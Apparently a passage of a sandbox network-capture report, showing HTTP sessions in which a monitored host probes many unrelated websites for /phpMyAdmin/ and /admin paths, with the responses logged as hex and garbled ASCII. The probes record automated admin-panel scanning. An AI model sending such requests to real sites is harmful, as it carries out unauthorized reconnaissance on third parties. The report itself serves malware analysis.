76 07 04 83 07 7e b3 35 e5 49 b4 6e ca 8f 55 a3 2a a8 72 fa d3 d5 38 89 72 d7 6b 81 e5 31 e0 65 7d 59 94 8e 7c b1 5a dd 37 02 e5 ab da eb 5e 64 e5 17 d3 be e5 60 c5 57 2e 6b a6 8b 21 71 12 75 59 33 77 90 68 5f f0 75 d5 35 37 7f aa 8b aa eb 17 fb c6 2d 57 65 d6 b9 8f 2d f8 79 3b 7e d3 86 e1 df 77 ae 59 7e df 76 4d 51 cd df 46 6f 4f a2 bf af 5d 73 13 17 d5 6a ed 8f d1 b8 bf af 8b c6 e5 c4 eb 31 7e b7 25 7a fb dd 49 54 54 e7 59 35 5f c3 a6 e8 70 55 0c 6f bf fd ee ed d9 a8 d7 c1 bb e3 49 1c 93 11 f9 3f fe f4 e4 d5 d7 7f 24 ab 72 3d 2f aa 84 c4 f1 f3 c7 8f 1f 9f 95 45 f5 23 69 5c 09 e7 94 18 5e f9 0d ee b1 52 d3 b6 bf bd 5e 96 48 15 5d e9 7e ba 55 c9 67 4d f6 f7 75 fd 8c fc ce b9 3c 22 8b c6 cd c6 1f d6 69 86 c2 51 70 f8 bf 9c 23 6a 7c 6d fb 70 b2 d3 a1 e3 90 f5 f6 04 9b a2 ca eb 4d f2 fd 66 e5 96 f5 0f c5 2b d7 75 b8 5e 4b c6 e4 4d 74 99 b5 ee 2f 4d b9 f3 cc df 46 7f 1b b5 c9 26 a9 9b f9 df 46 c5 Data Ascii: 1faav-[zrE~!uv>efo9`6h6Ec8w/($Jus5Y]QWdZfm;YM=PAgyqE\|.xZW]VT$y=nV,e2U_^Eet5_]l{-C\MwqCpBiV1S4GqqU{:yR716hYGr!_w;,=mkVuQly;hC[bYdSt-?uv$r=/rYbILdZ/GWkQ_ZWJO@d]uq+wz_2!$u\|.yQ?^}~~A'{/{96#([buE]?u2kq.2MZDD3_w}kt[Fu,v~5InU*r8rk1e}Y\|Z7^d`W.k!quY3wh_u57-We-y;~wY~vMQFoO]sj1~%zITTY5_pUoI?$r=/E#i\^R^H]~UgMu<"iQp#j\|mpMf+u^KMt/MF&F
Feb 21, 2024 00:26:12.378217936 CET	1286	IN	Data Raw: 12 67 6d ff 86 e1 8d fb db 28 34 ff 6d c4 64 42 13 fa b7 91 e1 d7 86 ff 6d 04 ef b9 6b ef 96 64 05 47 9c 44 ed d5 fc e7 cd 43 63 98 86 df af fb 81 f8 f2 71 bd 6e a6 ce 1b 7f 5a 57 10 3a b4 0d f3 c3 f8 fb f4 c0 eb 0a 3e 9e 96 eb dc 03 fe d0 86 87 Data Ascii: gm(4mdBmkdGDCcqnZW:>['K+u"}oEKfE~uWsW9'u5>*N7WYC=;~57!no\+mW\|\eqvtYc^uuuGz?$mz;>~
Feb 21, 2024 00:26:12.378237963 CET	1286	IN	Data Raw: 99 cd 71 b8 71 e7 ad 7b 5f c7 d7 d7 53 b7 ea 7e 87 b2 fb 27 ee f3 77 66 1f 3f fb e4 79 4f 0e 2a 3c 51 6c fa d5 1f 5f fe d9 65 f9 cd f8 09 43 d4 f8 cf 49 56 96 97 d9 f4 c7 fd 19 8e df 1c 16 d2 b7 ef c8 7a fc 66 38 a5 bb 27 15 4c 7b 3f f9 7f fe f3 Data Ascii: qq{_S~'wf?yO*<Ql_eCIVzf8'L{?(z&NGv=wG0>>uf>?%f<uC:3MQ$!~(\|gF?>k"?P6.\<m?~T,eQPN<~(/U<)^!{
Feb 21, 2024 00:26:12.378355026 CET	1286	IN	Data Raw: 0e 99 1d d1 13 32 fc 3f e1 77 af b8 ed ce 9d 5b 61 13 e8 d9 ff 51 f4 9e 6e f9 be 6e fc 36 ab 3d f2 7d bd ef 45 ae d7 9d 77 65 7e bb 3d 16 db 19 5c a9 13 b2 ff c3 8e 4f 76 85 b7 31 d8 fb 10 a6 4d d1 7e 90 1d 3a df 9e 6e 16 ae 71 47 49 d1 c2 5c 37 Data Ascii: 2?w[aQnn6=}Ewe~=\Ov1M~:nqGI\7 Jw}fItf:!$YY7xS-K] C<ob7=?uU7CgJuW'rU7]VwO_W>_^P~u;Vuw sf<>x
Feb 21, 2024 00:26:12.378432035 CET	1286	IN	Data Raw: 9b 82 67 dd 2c 63 13 4f db f6 29 59 34 6e 36 7e ba e8 ba d5 e9 68 b4 71 b3 ae 73 d3 45 05 d5 e7 85 6b 93 69 bd 1c 81 90 6f c4 59 46 ab 72 3d 2f aa 76 74 7b d0 a8 a8 a6 e5 3a 77 78 6f db 9e 06 3a db f6 f3 2b d7 8c 55 62 12 95 b0 a7 c4 3b 37 1b 3f Data Ascii: g,cO)Y4n6~hqsEkioYFr=/vt{:wxo:+Ub;7?)}fu9]o\jB'^W]s5;Kd-p,jNd"~*l/d~J7U6v}]7q0dqmG?#?3n\rqyk_yV?}06\|pK
Feb 21, 2024 00:26:12.378516912 CET	1286	IN	Data Raw: db d5 cb b8 07 c4 5e ff 02 c8 76 55 16 5d 57 54 f3 7f 25 56 3c 75 65 d9 fe 2b 10 f7 7e fd 55 71 1a d7 ae e0 d5 e2 ca c5 08 0f 00 7b d7 8e 46 1f f2 ed e0 ec ff ae eb 39 d2 df 64 73 f2 32 ab b2 b9 6b 42 fa ac 9d 36 c5 aa 7b 7e 34 5b 57 53 df 74 b4 Data Ascii: ^vU]WT%V<ue+~Uq{F9ds2kB6{~4[WSt9O8~n~$u8zt-c\|t]M2gWYCf\|]bk?do<i0k(A$/<5O?Y9~g?$Y{SM]vf:~+z7d
Feb 21, 2024 00:26:12.378568888 CET	796	IN	Data Raw: 49 94 29 7f 27 2c 09 36 42 e2 59 61 c9 94 1a bf a4 31 d4 4e 64 ea 59 86 a5 a0 25 c6 80 bd 54 e1 ae c6 32 eb 63 4e b1 0d b7 89 b2 92 4d b6 79 18 59 a8 94 f9 bc b5 da 7a 47 e3 80 2a cc d7 42 12 ef 6c ca ec c4 e3 2b cb 09 d3 c1 c8 c4 d3 b3 c0 81 9f Data Ascii: I)',6BYa1NdY%T2cNMyYzG*Bl+}P51o0SA6@>ynhVJ~\[)gMP1o)DXYb6xGL%PSk;VP66A9nlq;aX%1^ML\|QE"T>VBx
Feb 21, 2024 00:26:12.378599882 CET	1286	IN	Data Raw: 31 66 61 30 0d 0a ec 0b 5f a6 25 b8 e1 97 29 e2 9f a5 f5 c3 71 ce db 21 38 93 a1 6b e2 b1 65 ca fa 58 32 e4 01 23 a4 8f 79 2a 55 88 61 2c 1f 53 93 ea 89 e7 0e 1f 78 a5 50 66 c3 2e cc e7 41 39 f5 52 40 63 2c 49 04 7c ca 95 df 1d 67 55 21 86 a1 75 Data Ascii: 1fa0_%)q!8keX2#y*Ua,SxPf.A9R@c,I\|gU!us02HcbOr?(q6Dg~Lm.cM]ed-/5br=?I%$]oMqB/2r>?a;I]^7-r
Feb 21, 2024 00:26:12.378637075 CET	1286	IN	Data Raw: 62 a6 e8 f6 31 c6 63 44 f2 ac cb e2 ae e8 4a 37 8e be 6a 8a 2b 6f 96 ff 6e ea 4d b7 88 1e b8 ef 4f 3a 43 de 43 c4 f3 00 31 8a b6 dc cb a2 ed 5e 38 10 7a 7e 9b 84 97 ff 61 34 1e a2 fa ae f8 27 db e7 2e ef e7 93 ba ea 60 0f f2 aa 6b b2 ce cd 6f 7e Data Ascii: b1cDJ7j+onMO:CC1^8z~a4'.`ko~?u^MV^:pvt}Ee+yF(/PuXyI\jWY<+_X$fm*{@OyH_a7yIv?Nn\|t
Feb 21, 2024 00:26:12.378650904 CET	1286	IN	Data Raw: 22 d7 cb b2 6a c7 d1 a2 eb 56 a7 a3 d1 66 b3 49 36 22 a9 9b f9 88 53 4a fd 0e 77 b0 1e 9d ad b2 6e 41 f2 71 f4 52 26 fe 96 90 c6 5e a8 c4 2a 25 e5 0b 5c 9a 1b a9 cd 05 b3 2f 86 f4 eb 97 3c 61 ca 70 4e 64 c2 52 2d 60 2d 45 51 34 84 f8 11 12 31 2c Data Ascii: "jVfI6"SJwnAqR&^*%\/<apNdR-`-EQ41,}Z&:TkcI-;j24qfjhon'zV&0b_UhbXK/B-epg&wU2Id<<KIV61J+x#++i0[C>e/I
Feb 21, 2024 00:26:12.552405119 CET	1286	IN	Data Raw: 05 81 74 5f c7 44 df 07 d7 ec e7 60 2e bc b9 3d 43 00 b6 d4 06 26 29 0a 7a 6a da db ce 42 2c 3d 90 e7 61 19 cf 28 6c 67 95 1c d6 b5 fd fe fe 96 5e 10 e4 f6 0f bd 64 76 b2 7b 08 a2 8a 5e e5 30 23 c8 6e f6 20 e1 2e 2a 9d ec 58 84 cb c1 7f 3b 9e e1 Data Ascii: t_D`.=C&)zjB,=a(lg^dv{^0#n .*X;l?goNUlb:SjClSAI\|,H 5'^w!VI]We;Uv{QMd/Jw(\|XL,4:9jbjjb~o

Session ID	Source IP	Source Port	Destination IP	Destination Port
276	192.168.2.6	60910	91.195.240.135	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.158885956 CET	176	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: schussundtor.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.336134911 CET	343	IN	HTTP/1.1 301 Moved Permanently date: Tue, 20 Feb 2024 23:26:12 GMT content-type: text/html content-length: 166 location: //www.schussundtor.de/phpMyAdmin/ server: NginX Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
277	192.168.2.6	60936	217.160.122.119	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.169172049 CET	181	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: www.netzschnipsel.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.633403063 CET	1286	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:12 GMT Server: Apache X-Powered-By: PHP/7.3.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://www.netzschnipsel.de/wp-json/>; rel="https://api.w.org/" Content-Encoding: gzip Data Raw: 32 35 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d df 72 db b8 92 f7 75 5c 75 de 01 66 76 23 69 47 a4 44 49 fe 27 5b 9e e3 c4 4e c6 33 71 92 cf 72 36 7b 36 49 b9 28 09 92 18 53 a4 86 a4 2c 3b 99 bc c9 56 ed cd 79 86 bd 9a bb bc d8 fe 1a 00 ff 49 b4 4c 39 39 5f 6d 6d 6d 52 b6 25 12 40 37 1a dd 8d 46 77 03 38 d8 3c 7e fd ec e2 6f 6f 4e d8 38 9c 38 87 1b 07 f4 87 f5 1d 2b 08 3a 9a eb e9 9f 02 8d 39 96 3b ea 68 03 ae 1f 9f 68 ec 66 e2 b8 41 7b d8 eb 68 e3 30 9c b6 6b 35 6f 34 35 26 bc e6 06 b5 61 ef 71 f4 de 1a 0c c2 b1 8d 26 54 a1 f9 7c 6e a8 67 46 df 9b d4 c6 dc 99 d6 ac a9 ad 07 53 de d7 18 c1 e5 d6 e0 70 83 b1 83 09 0f 2d d6 1f 5b 7e c0 c3 8e f6 f6 e2 b9 be ab 25 2f 5c 6b c2 3b da b5 cd e7 53 cf 0f 35 d6 f7 dc 90 bb 28 38 b7 01 b1 33 e0 d7 76 9f eb e2 4b 95 d9 ae 1d da 96 a3 07 7d cb e1 1d d3 a8 cb 86 1c db bd 62 3e 77 3a da d4 f7 86 b6 c3 35 36 f6 f9 30 46 76 34 99 8e 0c cf 1f d5 6e 86 6e cd 34 97 2a d9 ee a8 67 f5 af 16 6a 51 17 5d 1e 7e 0e fa 63 d7 9e 06 dc 31 06 bc 06 6a f9 d3 be 31 1d 4f d1 0a f5 2e b4 43 87 1f 76 b9 1d 72 e6 da fd 71 c8 46 7c 38 73 07 dc 65 4f 1e ef 36 4c 73 9f bd 4a 37 c2 06 dc 67 5d af 8f 6e b0 33 3e b0 2d f6 d4 f1 46 07 35 d9 ce c6 41 d0 f7 ed 69 78 38 f0 fa b3 09 e8 60 44 1f 4e 1c 2e be 8b 91 7c 05 a2 b1 0e 8b de dd 5d c8 f0 f9 d4 b1 fa bc ac 86 be aa 61 fc 2b fb 07 35 05 66 e3 20 a6 5d 69 e0 06 fa 14 64 e3 61 7f 5c 92 04 2c d5 6a 79 54 28 b1 1a 06 f8 be 9a 81 31 27 a2 2f 14 d6 2c 27 e4 be 6b 85 18 a4 f0 76 8a b1 b7 a6 53 c7 ee 5b a1 ed b9 35 3f 08 7e 02 89 f1 8a c8 da d1 0a 90 8e 3d f1 ad df 67 de 3e 7b ce f9 a0 c8 10 0e 51 ae a6 65 bb f0 8f c3 ea 37 6f 42 e3 66 f9 7a 51 fc 20 4e 54 03 e2 17 23 fa e8 91 e2 0b 45 b2 90 df 84 b5 4f d6 b5 25 87 11 ac f8 e8 d1 a3 b9 ed 0e bc b9 71 39 9f f2 89 f7 c9 ee f2 30 04 63 07 e0 93 2f 5a cf 0a f8 5b df d1 da 42 7e 83 f6 87 da 87 9a 1a 9f 0f 35 7b 62 8d 78 f0 a1 d6 f7 7c fe a1 26 2a 7f a8 35 8c 86 61 7e a8 ed 34 6e 76 1a 1f 6a 5a 55 03 48 54 37 a6 ee 08 5f 82 eb d1 83 9a 43 3d d1 18 fe 9e c8 f6 f0 89 da f3 66 7e 9f 6b ed 2f 1a e4 1f bc 20 90 50 d8 0a 64 f3 d8 f0 43 6d 3e d5 6d b7 ef cc 06 84 fe 27 fc e0 81 a8 aa 43 1b 70 f4 d9 98 d8 ae f1 29 f8 f9 9a fb 9d 96 b1 63 34 76 b5 af 5f f7 89 5a 9b 10 d2 3e f1 5c 39 ac 5a 55 5e f9 72 6d f9 cc af ba 55 bb ea 75 2c a3 ef 73 60 a1 84 ae ac f5 2d 17 c4 d6 2a 55 a7 e3 19 23 1e 3e 23 2d 75 13 3e 79 92 fe 56 d6 1a 03 08 57 d4 30 eb 97 43 d9 2c 5f 6e 50 0d 5c 65 9f 1b 81 df ef 84 55 0e ed 32 04 96 dc 90 52 b1 38 c4 55 8b e0 2a 84 82 a7 b7 17 d6 88 b4 40 59 23 3d ab 55 de d7 3f 1a 10 24 ee 0e 9e 8d 6d 67 50 e6 95 af 43 cf 2f db 9d 23 df b7 6e cb da d0 b1 88 ce 82 38 2d f4 03 60 67 Data Ascii: 253a}ru\ufv#iGDI'[N3qr6{6I(S,;VyIL99_mmmR%@7Fw8<~ooN88+:9;hhfA{h0k5o45&aq&T\|ngFSp-[~%/\k;S5(83vK}b>w:560Fv4nn4gjQ]~c1j1O.CvrqF\|8seO6LsJ7g]n3>-F5Aix8`DN.\|]a+5f ]ida\,jyT(1'/,'kvS[5?~=g>{Qe7oBfzQ NT#EO%q90c/Z[B~5{bx\|&5a~4nvjZUHT7_C=f~k/ PdCm>m'Cp)c4v_Z>\9ZU^rmUu,s`-U#>#-u>yVW0C,_nP\eU2R8U@Y#=U?$mgPC/#n8-`g
Feb 21, 2024 00:26:12.633410931 CET	1286	IN	Data Raw: 53 d2 b8 41 e7 0b 07 75 6e a1 dd dd 51 7b b3 5e 4d be 9d dc f4 f9 34 7c 8e 9a 78 fe b5 ea 76 ea fb ee 81 6d 38 dc 1d 85 e3 7d f7 a7 9f 2a 49 2b ef ed f7 ee c7 8f 9d a8 ef 71 cf ab 56 a7 1b fa 68 da 18 fa de e4 19 66 81 67 de 80 ef db c3 f2 a6 f3 Data Ascii: SAunQ{^M4\|xvm8}I+qVhfgu\34Tv>?\!'s{41)"16m^gPZCGIIUjnmWw}6]\|[ehpfvMUoUwN}o[A
Feb 21, 2024 00:26:12.633434057 CET	1286	IN	Data Raw: 98 8e d0 13 e4 f4 24 0b d2 f2 73 db 61 82 4f be a7 95 05 d6 8b 4c b7 84 1e 07 9b ba fe de 1e 32 27 64 a7 27 6c ef 23 ac 3a 35 7d d3 3c 9d f6 56 3f d0 52 c3 0c 6e f3 1a 39 d1 b7 82 b1 7d 0d 0f a9 0d df 1c 3e a9 c9 54 cb 99 c3 7f 28 68 78 37 e0 02 Data Ascii: $saOL2'd'l#:5}<V?Rn9}>T(hx7>N_bfYf==#F2,z6qen%z7%\Gaa9a(8m-0Cc,no76mOE1Mm[.
Feb 21, 2024 00:26:12.633486986 CET	1286	IN	Data Raw: 0d a6 e6 45 f9 1a 7d 19 37 b3 05 a4 1c 68 87 dd b7 cf 7e 39 01 0f 37 0f 0f c4 d2 0f 99 68 63 0f ae 54 40 8d 9b 94 8d 88 d7 b1 01 09 42 8a 55 df 6a ff 01 79 26 1f 11 13 d2 df 47 07 c2 2a 4d c5 e1 16 20 68 4c ba 87 91 7e e7 b9 3d 67 e6 77 34 24 41 Data Ascii: E}7h~97hcT@BUjy&GM hL~=gw4$A#STSUR_Kwg1shSf# wKb[lPDF+RDAOSSS<9-RGYX}*GBvAhDg+-H1Ar8"A8YlKM/5NC
Feb 21, 2024 00:26:12.633514881 CET	1286	IN	Data Raw: 4d 17 fb f7 8e 68 11 aa 3d d4 7d 77 27 7e 7a b3 5e bf c1 4f ca 99 a7 91 b3 0b fb 20 35 13 a6 29 9c 09 e4 cd 55 5f 6a 18 57 e5 c4 03 bd 9e 13 8b c2 dd 00 99 40 2f e0 82 78 c5 67 28 0e 8d 7d 8f c3 ce 58 d8 9f 28 7b 28 4d 0a f8 31 68 87 62 4f ec 50 Data Ascii: Mh=}w'~z^O 5)U_jW@/xg(}X({(M1hbOPp.<B>`_M\|~O0RQ,oEVo@8VOUluNB@,=z'GujE,~ yR2%F.G8Ij~DF>qR
Feb 21, 2024 00:26:12.633527040 CET	1286	IN	Data Raw: 79 99 99 b5 e1 b3 a0 99 5b 78 e6 1f 15 1a 4e 25 d8 14 0e 42 e8 71 a4 f7 b8 8d 10 87 f2 23 51 4c 4a 1e bd d5 55 ef b1 c7 c9 4e fc 4c 44 73 f2 7c 12 54 39 93 8b 8f 6b 21 30 e0 b3 10 ab 7e f8 48 06 3a 1c cf 70 d3 8e c2 74 e2 c0 71 f2 9e 4d 66 f0 05 Data Ascii: y[xN%Bq#QLJUNLDs\|T9k!0~H:ptqMfg.\#Kr&\|r(M#r.:]I >+l0-"/&<d-vZM#YG5FC#J8LNL_EN}lfp1"$#!/GB{dNdafHHv82
Feb 21, 2024 00:26:12.633594990 CET	1286	IN	Data Raw: 45 2d 72 43 2d 73 be b9 93 a7 e3 cc 64 ae 28 42 af d8 cf b5 1e 5e 9f 70 42 93 8b b0 5b 18 e6 90 cc 6c e5 0e 64 32 51 14 41 ec 57 09 81 5d 88 cd 54 c5 99 ff 13 02 9d 2e 24 3a 80 a3 2c 0f 37 33 4f a1 99 c9 cc b0 72 38 a5 a1 f6 6b 0a c4 7a 64 73 a0 Data Ascii: E-rC-sd(B^pB[ld2QAW]T.$:,73Or8kzdslk@Gf2^FrQ]ona[9rzoHe#*3q3E'D2@rczE!_j0+(\|`lY-9cLHTkD
Feb 21, 2024 00:26:12.633610010 CET	951	IN	Data Raw: c9 6c 5c cf 29 ce ef 4d d7 65 0c 57 65 94 05 f0 f7 f6 47 dc 25 89 6c be 57 e8 89 41 87 07 dc bc 1e 96 4b 83 e0 77 91 d9 6d 0f 4a 15 b6 d9 61 ba c9 9e 3c 91 4d 53 8d 29 4e ff 72 c3 57 c0 de 80 e1 4f 55 59 07 54 38 42 61 3a 2b 78 f9 5f 0c 2b 55 13 Data Ascii: l\)MeWeG%lWAKwmJa<MS)NrWOUYT8Ba:+x_+Uf!s@yH-$HrC{,e7WEh4QN:!%xvX.=,\^yJ}5S9o\>9LTQwa(aX[EI1K\|VpCxqI-^

Session ID	Source IP	Source Port	Destination IP	Destination Port
278	192.168.2.6	60995	86.107.32.28	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.203764915 CET	168	OUT	GET /admin HTTP/1.1 Host: collevilca.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.389450073 CET	1286	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Server: BitNinja Captcha Server Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Length: 45173 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 56 69 73 69 74 6f 72 20 61 6e 74 69 2d 72 6f 62 6f 74 20 76 61 6c 69 64 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 0a 20 20 20 20 20 20 62 6f 64 79 2c 0a 20 20 20 20 20 20 64 69 76 2c 0a 20 20 20 20 20 20 73 70 61 6e 2c 0a 20 20 20 20 20 20 61 70 70 6c 65 74 2c 0a 20 20 20 20 20 20 6f 62 6a 65 63 74 2c 0a 20 20 20 20 20 20 69 66 72 61 6d 65 2c 0a 20 20 20 20 20 20 68 31 2c 0a 20 20 20 20 20 20 68 32 2c 0a 20 20 20 20 20 20 68 33 2c 0a 20 20 20 20 20 20 68 34 2c 0a 20 20 20 20 20 20 68 35 2c 0a 20 20 20 20 20 20 68 36 2c 0a 20 20 20 20 20 20 70 2c 0a 20 20 20 20 20 20 62 6c 6f 63 6b 71 75 6f 74 65 2c 0a 20 20 20 20 20 20 70 72 65 2c 0a 20 20 20 20 20 20 61 2c 0a 20 20 20 20 20 20 61 62 62 72 2c 0a 20 20 20 20 20 20 61 63 72 6f 6e 79 6d 2c 0a 20 20 20 20 20 20 61 64 64 72 65 73 73 2c 0a 20 20 20 20 20 20 62 69 67 2c 0a 20 20 20 20 20 20 63 69 74 65 2c 0a 20 20 20 20 20 20 63 6f 64 65 2c 0a 20 20 20 20 20 20 64 65 6c 2c 0a 20 20 20 20 20 20 64 66 6e 2c 0a 20 20 20 20 20 20 65 6d 2c 0a 20 20 20 20 20 20 69 6d 67 2c 0a 20 20 20 20 20 20 69 6e 73 2c 0a 20 20 20 20 20 20 6b 62 64 2c 0a 20 20 20 20 20 20 71 2c 0a 20 20 20 20 20 20 73 2c 0a 20 20 20 20 20 20 73 61 6d 70 2c 0a 20 20 20 20 20 20 73 6d 61 6c 6c 2c 0a 20 20 20 20 20 20 73 74 72 69 6b 65 2c 0a 20 20 20 20 20 20 73 74 72 6f 6e 67 2c 0a 20 20 20 20 20 20 73 75 62 2c 0a 20 20 20 20 20 20 73 75 70 2c 0a 20 20 20 20 20 20 74 74 2c 0a 20 20 20 20 20 20 76 61 72 2c 0a 20 20 20 20 20 20 62 2c 0a 20 20 20 20 20 20 75 2c 0a 20 20 20 20 20 20 69 2c 0a 20 20 20 20 20 20 63 65 6e 74 65 72 2c 0a 20 20 20 20 20 20 64 6c 2c 0a 20 20 20 20 20 20 64 74 2c 0a 20 20 20 20 20 20 64 64 2c 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"/> <title>Visitor anti-robot validation</title> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><meta name="keywords" content="joomla, Joomla, joomla 1.5, wordpress 2.5, Drupal" /><meta name="description" content="Joomla!" /><meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /><meta name="generator" content="WordPress 2.5" /> <style> html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd,
Feb 21, 2024 00:26:12.389530897 CET	1286	IN	Data Raw: 20 20 20 20 20 20 6f 6c 2c 0a 20 20 20 20 20 20 75 6c 2c 0a 20 20 20 20 20 20 6c 69 2c 0a 20 20 20 20 20 20 66 69 65 6c 64 73 65 74 2c 0a 20 20 20 20 20 20 66 6f 72 6d 2c 0a 20 20 20 20 20 20 6c 61 62 65 6c 2c 0a 20 20 20 20 20 20 6c 65 67 65 6e Data Ascii: ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details,
Feb 21, 2024 00:26:12.389684916 CET	1286	IN	Data Raw: 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 43 61 6c 69 62 72 69 22 2c 20 52 6f 62 6f 74 6f 2c 0a 20 20 20 20 20 20 20 20 20 20 4f 78 79 Data Ascii: font-family: -apple-system, BlinkMacSystemFont, "Calibri", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; line-height: 150%; } .page-container { background-color: transparent;
Feb 21, 2024 00:26:12.389730930 CET	1286	IN	Data Raw: 61 6c 65 72 74 20 70 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 70 61 67 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 Data Ascii: alert p { padding: 10px 0; } .page-container .captcha-container { margin-top: -20px; } @media screen and (min-width: 460px) { .page-container .captcha-container { padding: 10px 10px;
Feb 21, 2024 00:26:12.389785051 CET	1286	IN	Data Raw: 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 70 61 67 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 20 23 6d 6f 72 65 49 Data Ascii: font-weight: bold; } .page-container .captcha-container #moreInfoDropdown { font-size: 14px; text-align: center; color: #c40000; cursor: pointer; } .page-container .captcha-contai
